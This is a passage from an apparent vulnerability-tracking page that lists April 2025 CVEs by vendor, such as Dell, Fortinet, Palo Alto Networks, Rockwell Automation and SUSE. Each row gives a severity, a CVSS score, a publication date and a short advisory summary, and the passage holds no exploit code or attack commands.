CVE-2025-30280 | Medium | 5.3 | — | 2025-04-08 | A vulnerability has been identified in Mendix Runtime V10 (All versions < V10.21.0), Mendix Runtime V10.12 (All versions < V10.12.16), Mendix Runtime V10.18 (All versions < V10.18.5), Mendix Runtime V10.6 (All versions < V10.6.22), Mendix… |
Dell · 12 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27690 | Critical | 9.8 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.5.0.0 through 9.10.1.0, contains a use of default password vulnerability. |
CVE-2025-29986 | High | 8.3 | — | 2025-04-08 | Dell Common Event Enabler, version(s) CEE 9.0.0.0, contain(s) an Improper Restriction of Communication Channel to Intended Endpoints vulnerability in the Common Anti-Virus Agent (CAVA). |
CVE-2025-26330 | High | 7.0 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.4.0.0 through 9.10.0.1, contains an incorrect authorization vulnerability. |
CVE-2025-29988 | Medium | 6.9 | — | 2025-04-09 | Dell Client Platform BIOS contains a Stack-based Buffer Overflow Vulnerability. |
CVE-2025-22471 | Medium | 6.5 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.4.0.0 through 9.10.0.1, contains an integer overflow or wraparound vulnerability. |
CVE-2025-29985 | Medium | 6.5 | — | 2025-04-08 | Dell Common Event Enabler, version(s) CEE 9.0.0.0, contain(s) an Initialization of a Resource with an Insecure Default vulnerability in the Common Anti-Virus Agent (CAVA). |
CVE-2025-26335 | Medium | 5.8 | — | 2025-04-11 | Dell PowerProtect Cyber Recovery, versions prior to 19.18.0.2, contains an Insertion of Sensitive Information Into Sent Data vulnerability. |
CVE-2025-26480 | Medium | 5.3 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.5.0.0 through 9.10.0.0, contains an uncontrolled resource consumption vulnerability. |
CVE-2025-23378 | Low | 3.3 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.4.0.0 through 9.10.0.0, contains an exposure of information through directory listing vulnerability. |
CVE-2025-26479 | Low | 3.1 | — | 2025-04-10 | Dell PowerScale OneFS, versions 9.4.0.0 through 9.10.0.0, contains an out-of-bounds write vulnerability. |
CVE-2025-29989 | Low | 3.1 | — | 2025-04-10 | Dell Client Platform BIOS contains a Security Version Number Mutable to Older Versions vulnerability. |
CVE-2025-27686 | Low | 2.7 | — | 2025-04-07 | Dell Unisphere for PowerMax, version(s) prior to 10.2.0.9 and PowerMax version(s) prior to PowerMax 9.2.4.15, contain an Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability. |
Apple · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2023-42970 | High | 8.8 | — | 2025-04-11 | A use-after-free issue was addressed with improved memory management. |
CVE-2023-42977 | High | 7.8 | — | 2025-04-11 | A path handling issue was addressed with improved validation. |
CVE-2023-42875 | High | 7.3 | — | 2025-04-11 | Processing web content may lead to arbitrary code execution. |
CVE-2023-41076 | High | 7.3 | — | 2025-04-11 | An app may be able to elevate privileges. |
CVE-2023-42983 | Medium | 6.4 | — | 2025-04-11 | Processing a file may lead to a denial-of-service or potentially disclose memory contents. |
CVE-2023-42982 | Medium | 6.4 | — | 2025-04-11 | Processing a file may lead to a denial-of-service or potentially disclose memory contents. |
CVE-2023-42961 | Medium | 6.3 | — | 2025-04-11 | A path handling issue was addressed with improved validation. |
CVE-2023-42981 | Medium | 5.4 | — | 2025-04-11 | Processing a file may lead to a denial-of-service or potentially disclose memory contents. |
CVE-2023-38614 | Medium | 4.3 | — | 2025-04-11 | A permissions issue was addressed with additional restrictions. |
CVE-2023-42973 | Medium | 4.0 | — | 2025-04-11 | Private Browsing tabs may be accessed without authentication. |
CVE-2023-42969 | Low | 3.3 | — | 2025-04-11 | An app may be able to break out of its sandbox. |
Fortinet · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-48887 | Critical | 9.8 | — | 2025-04-08 | An unverified password change vulnerability in the Fortinet FortiSwitch GUI may allow a remote unauthenticated attacker to change admin passwords via a specially crafted request. |
CVE-2024-26013 | High | 7.5 | — | 2025-04-08 | An improper restriction of communication channel to intended endpoints vulnerability [CWE-923] in Fortinet FortiOS version 7.4.0 through 7.4.4, 7.2.0 through 7.2.8, 7.0.0 through 7.0.15, 6.4.0 through 6.4.15 and before 6.2.16, Fortinet Fort… |
CVE-2023-37930 | High | 7.5 | — | 2025-04-08 | Multiple issues, including use of uninitialized resources [CWE-908] and excessive iteration [CWE-834] vulnerabilities, in Fortinet allow a VPN user to corrupt memory, potentially leading to code or command execution via… |
CVE-2025-25254 | High | 7.2 | — | 2025-04-08 | An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability [CWE-22] in FortiWeb version 7.6.2 and below, version 7.4.6 and below, 7.2 all versions, 7.0 all versions endpoint may allow an authenticated a… |
CVE-2024-54024 | High | 7.2 | — | 2025-04-08 | An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiIsolator before version 2.4.6 allows a privileged attacker with super-admin profile and CLI access to exe… |
CVE-2024-54025 | Medium | 6.7 | — | 2025-04-08 | An improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiIsolator CLI before version 2.4.6 allows a privileged attacker to execute unauthorized code or commands v… |
CVE-2024-46671 | Medium | 6.2 | — | 2025-04-08 | An Incorrect User Management vulnerability [CWE-286] in FortiWeb version 7.6.2 and below, version 7.4.6 and below, version 7.2.10 and below, version 7.0.11 and below widgets dashboard may allow an authenticated attacker with at least read-… |
CVE-2024-52962 | Medium | 5.3 | — | 2025-04-08 | An Improper Output Neutralization for Logs vulnerability [CWE-117] in FortiAnalyzer version 7.6.1 and below, version 7.4.5 and below, version 7.2.8 and below, version 7.0.13 and below and FortiManager version 7.6.1 and below, version 7.4.5… |
CVE-2024-50565 | Low | 3.1 | — | 2025-04-08 | An improper restriction of communication channel to intended endpoints vulnerability [CWE-923] in Fortinet FortiOS version 7.4.0 through 7.4.3, 7.2.0 through 7.2.7, 7.0.0 through 7.0.14, 6.4.0 through 6.4.15 and 6.2.0 through 6.2.16, Fortin… |
CVE-2025-22855 | Low | 2.7 | — | 2025-04-08 | An improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Fortinet FortiClient before 7.4.1 may allow the EMS administrator to send messages containing javascript code. |
CVE-2024-32122 | Low | 2.3 | — | 2025-04-08 | A storing passwords in a recoverable format vulnerability in Fortinet FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions allows an attacker to disclose information via modification of LDAP server IP… |
Palo Alto Networks · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-0120 | High | 7.0 | — | 2025-04-11 | A vulnerability with a privilege management mechanism in the Palo Alto Networks GlobalProtect™ app on Windows devices allows a locally authenticated non-administrative Windows user to escalate their privileges to NT AUTHORITY\SYSTEM. |
CVE-2025-0124 | Low | 3.8 | — | 2025-04-11 | An authenticated file deletion vulnerability in the Palo Alto Networks PAN-OS® software enables an authenticated attacker with network access to the management web interface to delete certain files as the “nobody” user; this includes limit… |
CVE-2025-0129 | — | — | — | 2025-04-11 | An improper exception check in Palo Alto Networks Prisma Access Browser allows a low privileged user to prevent Prisma Access Browser from applying its Policy Rules. |
CVE-2025-0123 | — | — | — | 2025-04-11 | A vulnerability in the Palo Alto Networks PAN-OS® software enables unlicensed administrators to view clear-text data captured using the packet capture feature https://docs.paloaltonetworks.com/pan-os/11-0/pan-os-admin/monitoring/take-pack… |
CVE-2025-0119 | — | — | — | 2025-04-11 | A command injection vulnerability in the Palo Alto Networks Cortex XDR® Broker VM allows an authenticated user to execute arbitrary OS commands with root privileges on the host operating system running Broker VM. |
CVE-2025-0128 | — | — | — | 2025-04-11 | A denial-of-service (DoS) vulnerability in the Simple Certificate Enrollment Protocol (SCEP) authentication feature of Palo Alto Networks PAN-OS® software enables an unauthenticated attacker to initiate system reboots using a maliciously c… |
CVE-2025-0127 | — | — | — | 2025-04-11 | A command injection vulnerability in Palo Alto Networks PAN-OS® software enables an authenticated administrator to bypass system restrictions and run arbitrary commands as a root user. |
CVE-2025-0126 | — | — | — | 2025-04-11 | When configured using SAML, a session fixation vulnerability in the GlobalProtect™ login enables an attacker to impersonate a legitimate authorized user and perform actions as that GlobalProtect user. |
CVE-2025-0125 | — | — | — | 2025-04-11 | An improper input neutralization vulnerability in the management web interface of the Palo Alto Networks PAN-OS® software enables a malicious authenticated read-write administrator to impersonate another legitimate authenticated PAN-OS adm… |
CVE-2025-0122 | — | — | — | 2025-04-11 | A denial-of-service (DoS) vulnerability in Palo Alto Networks Prisma® SD-WAN ION devices enables an unauthenticated attacker in a network adjacent to a Prisma SD-WAN ION device to disrupt the packet processing capabilities of the device by… |
CVE-2025-0121 | — | — | — | 2025-04-11 | A null pointer dereference vulnerability in the Palo Alto Networks Cortex® XDR agent on Windows devices allows a low-privileged local Windows user to crash the agent. |
Pcman · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3380 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in PCMan FTP Server 2.0.7. |
CVE-2025-3379 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical was found in PCMan FTP Server 2.0.7. |
CVE-2025-3378 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical has been found in PCMan FTP Server 2.0.7. |
CVE-2025-3377 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PCMan FTP Server 2.0.7. |
CVE-2025-3376 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PCMan FTP Server 2.0.7. |
CVE-2025-3375 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PCMan FTP Server 2.0.7. |
CVE-2025-3374 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PCMan FTP Server 2.0.7 and classified as critical. |
CVE-2025-3373 | High | 7.3 | — | 2025-04-07 | A vulnerability has been found in PCMan FTP Server 2.0.7 and classified as critical. |
CVE-2025-3372 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in PCMan FTP Server 2.0.7. |
CVE-2025-3371 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in PCMan FTP Server 2.0.7. |
CVE-2025-3349 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, has been found in PCMan FTP Server 2.0.7. |
Rockwell Automation · 11 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3289 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a stack-based memory buffer overflow. |
CVE-2025-3288 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to read outside of the allocated memory buffer. |
CVE-2025-3287 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a stack-based memory buffer overflow. |
CVE-2025-3286 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to read outside of the allocated memory buffer. |
CVE-2025-3285 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to read outside of the allocated memory buffer. |
CVE-2025-2829 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to write outside of the allocated memory buffer. |
CVE-2025-2293 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to write outside of the allocated memory buffer. |
CVE-2025-2288 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to a threat actor being able to write outside of the allocated memory buffer. |
CVE-2025-2287 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to an uninitialized pointer. |
CVE-2025-2286 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to an uninitialized pointer. |
CVE-2025-2285 | High | 7.8 | — | 2025-04-08 | A local code execution vulnerability exists in the Rockwell Automation Arena® due to an uninitialized pointer. |
Linux · 10 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22017 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: devlink: fix xa_alloc_cyclic() error handling In case of returning 1 from xa_alloc_cyclic() (wrapping) ERR_PTR(1) will be returned, which will cause IS_ERR() to be false. |
CVE-2025-22016 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: dpll: fix xa_alloc_cyclic() error handling In case of returning 1 from xa_alloc_cyclic() (wrapping) ERR_PTR(1) will be returned, which will cause IS_ERR() to be false. |
CVE-2025-22015 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: mm/migrate: fix shmem xarray update during migration A shmem folio can be either in page cache or in swap cache, but not at the same time. |
CVE-2025-22014 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: soc: qcom: pdr: Fix the potential deadlock When some client process A call pdr_add_lookup() to add the look up for the service and does schedule locator work, later a pr… |
CVE-2025-22013 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Unconditionally save+flush host FPSIMD/SVE/SME state There are several problems with the way hyp code lazily saves the host's FPSIMD/SVE state, including: *… |
CVE-2025-22012 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: Revert "arm64: dts: qcom: sdm845: Affirm IDR0.CCTW on apps_smmu" There are reports that the pagetable walker cache coherency is not a given across the spectrum of SDM845… |
CVE-2025-22011 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: ARM: dts: bcm2711: Fix xHCI power-domain During s2idle tests on the Raspberry CM4 the VPU firmware always crashes on xHCI power-domain resume: root@raspberrypi:/sys/pow… |
CVE-2025-22010 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: RDMA/hns: Fix soft lockup during bt pages loop Driver runs a for-loop when allocating bt pages and mapping them with buffer pages. |
CVE-2025-22009 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: regulator: dummy: force synchronous probing Sometimes I get a NULL pointer dereference at boot time in kobject_get() with the following call stack: anatop_regulator_pro… |
CVE-2025-22008 | Medium | 5.5 | — | 2025-04-08 | In the Linux kernel, the following vulnerability has been resolved: regulator: check that dummy regulator has been probed before using it Due to asynchronous driver probing there is a chance that the dummy regulator hasn't already been p… |
Inaba Denki Sangyo Co., Ltd. · 8 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-27797 | Critical | 9.8 | — | 2025-04-09 | OS command injection vulnerability in the specific service exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-25053 | High | 8.8 | — | 2025-04-09 | OS command injection vulnerability in the WEB UI (the setting page) exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-29870 | High | 7.5 | — | 2025-04-09 | Missing authentication for critical function vulnerability exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-27934 | High | 7.5 | — | 2025-04-09 | Information disclosure of authentication information in the specific service vulnerability exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-25213 | Medium | 6.5 | — | 2025-04-09 | Improper restriction of rendered UI layers or frames issue exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-27722 | Medium | 5.9 | — | 2025-04-09 | Cleartext transmission of sensitive information issue exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-25056 | Medium | 4.3 | — | 2025-04-09 | Cross-site request forgery vulnerability exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
CVE-2025-23407 | Medium | 4.3 | — | 2025-04-09 | Incorrect privilege assignment vulnerability in the WEB UI (the setting page) exists in Wi-Fi AP UNIT 'AC-WPS-11ac series'. |
Apollographql · 7 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32380 | High | 7.5 | — | 2025-04-09 | The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. |
CVE-2025-32034 | High | 7.5 | — | 2025-04-07 | The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. |
CVE-2025-32033 | High | 7.5 | — | 2025-04-07 | The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. |
CVE-2025-32032 | High | 7.5 | — | 2025-04-07 | The Apollo Router Core is a configurable, high-performance graph router written in Rust to run a federated supergraph that uses Apollo Federation 2. |
CVE-2025-32031 | High | 7.5 | — | 2025-04-07 | Apollo Gateway provides utilities for combining multiple GraphQL microservices into a single GraphQL endpoint. |
CVE-2025-32030 | High | 7.5 | — | 2025-04-07 | Apollo Gateway provides utilities for combining multiple GraphQL microservices into a single GraphQL endpoint. |
CVE-2025-31496 | High | 7.5 | — | 2025-04-07 | apollo-compiler is a query-based compiler for the GraphQL query language. |
Google · 7 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-20656 | Medium | 6.8 | — | 2025-04-07 | In DA, there is a possible out of bounds write due to a missing bounds check. |
CVE-2025-20662 | Medium | 6.7 | — | 2025-04-07 | In PlayReady TA, there is a possible out of bounds read due to a missing bounds check. |
CVE-2025-20661 | Medium | 6.7 | — | 2025-04-07 | In PlayReady TA, there is a possible out of bounds read due to a missing bounds check. |
CVE-2025-20660 | Medium | 6.7 | — | 2025-04-07 | In PlayReady TA, there is a possible out of bounds read due to a missing bounds check. |
CVE-2025-20657 | Medium | 6.7 | — | 2025-04-07 | In vdec, there is a possible permission bypass due to improper input validation. |
CVE-2025-20658 | Medium | 6.0 | — | 2025-04-07 | In DA, there is a possible permission bypass due to a logic error. |
CVE-2025-20655 | Medium | 5.3 | — | 2025-04-07 | In keymaster, there is a possible out of bounds read due to a missing bounds check. |
Openatom · 7 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22851 | Medium | 6.5 | — | 2025-04-07 | OpenHarmony v5.0.2 and prior versions allow a local attacker to execute arbitrary code in pre-installed apps through integer overflow. |
CVE-2025-27534 | Low | 3.3 | — | 2025-04-07 | OpenHarmony v5.0.2 and prior versions allow a local attacker to cause DoS through missing release of memory. |
CVE-2025-25057 | Low | 3.3 | — | 2025-04-07 | OpenHarmony v5.0.2 and prior versions allow a local attacker to cause DoS through missing release of memory. |
CVE-2025-24304 | Low | 3.3 | — | 2025-04-07 | OpenHarmony v5.0.2 and prior versions allow a local attacker to cause DoS through out-of-bounds write. |
CVE-2025-22842 | Low | 3.3 | — | 2025-04-07 | OpenHarmony v5.0.2 and prior versions allow a local attacker to cause DoS through out-of-bounds read. |
CVE-2025-22452 | Low | 3.3 | — | 2025-04-07 | OpenHarmony v5.0.2 and prior versions allow a local attacker to cause DoS through out-of-bounds read. |
CVE-2025-20102 | Low | 3.3 | — | 2025-04-07 | OpenHarmony v5.0.2 and prior versions allow a local attacker to cause DoS through out-of-bounds read. |
Suse · 7 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-23391 | Critical | 9.1 | — | 2025-04-11 | An Incorrect Privilege Assignment vulnerability in SUSE rancher allows a Restricted Administrator to change the password of Administrators and take over their accounts. |
CVE-2025-23389 | High | 8.4 | — | 2025-04-11 | An Improper Access Control vulnerability in SUSE rancher allows a local user to impersonate other identities through SAML Authentication on first login. |
CVE-2025-23388 | High | 8.2 | — | 2025-04-11 | A Stack-based Buffer Overflow vulnerability in SUSE rancher allows for denial of service. This issue affects rancher: from 2.8.0 before 2.8.13, from 2.9.0 before 2.9.7, from 2.10.0 before 2.10.3. |
CVE-2025-23386 | High | 7.8 | — | 2025-04-10 | An Incorrect Default Permissions vulnerability in the openSUSE Tumbleweed package gerbera allows the service user gerbera to escalate to root. This issue affects gerbera on openSUSE Tumbleweed before 2.5.0-1.1. |
CVE-2024-52280 | High | 7.7 | — | 2025-04-11 | An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher allows users to watch resources they are not allowed to access, when they have at least some generic permissions on the type. |
CVE-2024-52282 | Medium | 6.2 | — | 2025-04-11 | An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher allows any user with GET access to the Rancher Manager Apps Catalog to read any sensitive information that is contained within the Apps' value… |
CVE-2025-23387 | Medium | 5.3 | — | 2025-04-11 | An Exposure of Sensitive Information to an Unauthorized Actor vulnerability in SUSE rancher allowed unauthenticated users to list all CLI authentication tokens and delete them before the CLI is able to get the token value. This issue affects… |
Dnnsoftware · 6 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-32373 | Medium | 6.5 | — | 2025-04-09 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32372 | Medium | 6.5 | — | 2025-04-09 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32374 | Medium | 5.9 | — | 2025-04-09 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32371 | Medium | 4.3 | — | 2025-04-09 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32036 | Medium | 4.2 | — | 2025-04-08 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
CVE-2025-32035 | Low | 2.6 | — | 2025-04-08 | DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. |
Ivanti · 6 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-22466 | High | 8.2 | — | 2025-04-08 | Reflected XSS in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows a remote unauthenticated attacker to obtain admin privileges. |
CVE-2025-22458 | High | 7.8 | — | 2025-04-08 | DLL hijacking in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows an authenticated attacker to escalate to System. |
CVE-2025-22461 | High | 7.2 | — | 2025-04-08 | SQL injection in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows a remote authenticated attacker with admin privileges to achieve code execution. |
CVE-2025-22465 | Medium | 6.1 | — | 2025-04-08 | Reflected XSS in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows a remote unauthenticated attacker to execute arbitrary javascript in a victim's browser. |
CVE-2025-22464 | Medium | 6.1 | — | 2025-04-08 | An untrusted pointer dereference vulnerability in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows an attacker with local access to write arbitrary data into memory causing a denial-of-service condition. |
CVE-2025-22459 | Medium | 4.8 | — | 2025-04-08 | Improper certificate validation in Ivanti Endpoint Manager before version 2024 SU1 or before version 2022 SU7 allows a remote unauthenticated attacker to intercept limited traffic between clients and servers. |
Wikimedia Foundation · 6 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3469 | — | — | — | 2025-04-10 | Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. |
CVE-2025-32700 | — | — | — | 2025-04-10 | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation AbuseFilter. |
CVE-2025-32699 | — | — | — | 2025-04-10 | Vulnerability in Wikimedia Foundation MediaWiki, Wikimedia Foundation Parsoid. This issue affects MediaWiki: before 1.39.12, 1.42.6, 1.43.1; Parsoid: before 0.16.5, 0.19.2, 0.20.2. |
CVE-2025-32698 | — | — | — | 2025-04-10 | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wikimedia Foundation MediaWiki. |
CVE-2025-32697 | — | — | — | 2025-04-10 | Improper Preservation of Permissions vulnerability in Wikimedia Foundation MediaWiki. |
CVE-2025-32696 | — | — | — | 2025-04-10 | Improper Preservation of Permissions vulnerability in Wikimedia Foundation MediaWiki. |
Elastic · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2024-12556 | High | 8.7 | — | 2025-04-08 | Prototype Pollution in Kibana can lead to code injection via unrestricted file upload combined with path traversal. |
CVE-2025-25013 | Medium | 6.5 | — | 2025-04-08 | Improper restriction of environment variables in Elastic Defend can lead to exposure of sensitive information such as API keys and tokens via automatic transmission of unfiltered environment variables to the stack. |
CVE-2024-52980 | Medium | 6.5 | — | 2025-04-08 | A flaw was discovered in Elasticsearch, where a large recursion using the innerForbidCircularReferences function of the PatternBank class could cause the Elasticsearch node to crash. |
CVE-2024-52974 | Medium | 6.5 | — | 2025-04-08 | An issue has been identified where a specially crafted request sent to an Observability API could cause the Kibana server to crash. |
CVE-2024-52981 | Medium | 4.9 | — | 2025-04-08 | An issue was discovered in Elasticsearch, where a large recursion using the Well-Known Text formatted string with nested GeometryCollection objects could cause a stack overflow. |
Gitlab · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-1677 | Medium | 6.5 | — | 2025-04-10 | A Denial of Service (DoS) issue has been discovered in GitLab CE/EE affecting all versions up to 17.8.7, 17.9 prior to 17.9.6 and 17.10 prior to 17.10.4. A denial of service could occur upon injecting oversized payloads into CI pipeline exports. |
CVE-2025-0362 | Medium | 6.4 | — | 2025-04-10 | An issue has been discovered in GitLab CE/EE affecting all versions from 7.7 before 17.8.7, 17.9 before 17.9.6, and 17.10 before 17.10.4. |
CVE-2024-11129 | Medium | 6.3 | — | 2025-04-10 | An issue has been discovered in GitLab EE affecting all versions from 17.1 before 17.8.7, 17.9 before 17.9.6, and 17.10 before 17.10.4. |
CVE-2025-2408 | Medium | 5.3 | — | 2025-04-10 | An issue has been discovered in GitLab CE/EE affecting all versions from 13.12 before 17.8.7, 17.9 before 17.9.6, and 17.10 before 17.10.4. |
CVE-2025-2469 | Low | 3.7 | — | 2025-04-10 | An issue has been discovered in GitLab CE/EE affecting all versions from 17.9 before 17.9.6, and 17.10 before 17.10.4. |
Hailey888 · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3388 | Medium | 4.3 | — | 2025-04-07 | A vulnerability classified as problematic was found in hailey888 oa_system up to 2025.01.01. |
CVE-2025-3392 | Low | 3.5 | — | 2025-04-08 | A vulnerability was found in hailey888 oa_system up to 2025.01.01 and classified as problematic. |
CVE-2025-3391 | Low | 3.5 | — | 2025-04-08 | A vulnerability has been found in hailey888 oa_system up to 2025.01.01 and classified as problematic. |
CVE-2025-3390 | Low | 3.5 | — | 2025-04-08 | A vulnerability, which was classified as problematic, was found in hailey888 oa_system up to 2025.01.01. |
CVE-2025-3389 | Low | 3.5 | — | 2025-04-08 | A vulnerability, which was classified as problematic, has been found in hailey888 oa_system up to 2025.01.01. |
Phpgurukul · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-3370 | High | 7.3 | — | 2025-04-07 | A vulnerability classified as critical has been found in PHPGurukul Men Salon Management System 1.0. |
CVE-2025-3353 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PHPGurukul Men Salon Management System 1.0. |
CVE-2025-3352 | High | 7.3 | — | 2025-04-07 | A vulnerability was found in PHPGurukul Old Age Home Management System 1.0 and classified as critical. |
CVE-2025-3351 | High | 7.3 | — | 2025-04-07 | A vulnerability has been found in PHPGurukul Old Age Home Management System 1.0 and classified as critical. |
CVE-2025-3350 | High | 7.3 | — | 2025-04-07 | A vulnerability, which was classified as critical, was found in PHPGurukul Old Age Home Management System 1.0. |
Schneider Electric · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
CVE-2025-2223 | High | 7.8 | — | 2025-04-09 | CWE-20: Improper Input Validation vulnerability exists that could cause a loss of Confidentiality, Integrity and Availability of engineering workstation when a malicious project file is loaded by a user from the local system. |
CVE-2025-2222 | High | 7.8 | — | 2025-04-09 | CWE-552: Files or Directories Accessible to External Parties vulnerability over HTTPS exists that could leak information and lead to potential privilege escalation following a man-in-the-middle attack. |
CVE-2025-2442 | Medium | 6.8 | — | 2025-04-09 | CWE-1188: Initialization of a Resource with an Insecure Default vulnerability exists that could potentially lead to unauthorized access which could result in the loss of confidentiality, integrity and availability when a malicious user, hav… |
CVE-2025-2441 | Medium | 4.6 | — | 2025-04-09 | CWE-1188: Initialization of a Resource with an Insecure Default vulnerability exists that could lead to loss of confidentiality when a malicious user, having physical access, sets the radio in factory default mode where the product does no… |
CVE-2025-2440 | Medium | 4.2 | — | 2025-04-09 | CWE-922: Insecure Storage of Sensitive Information vulnerability exists that could potentially lead to unauthorized access of confidential data when a malicious user, having physical access and advanced information on the file system, sets… |
Stylemix · 5 CVEs
| CVE | Severity | CVSS | KEV | Published | Summary |
|---|---|---|---|---|---|
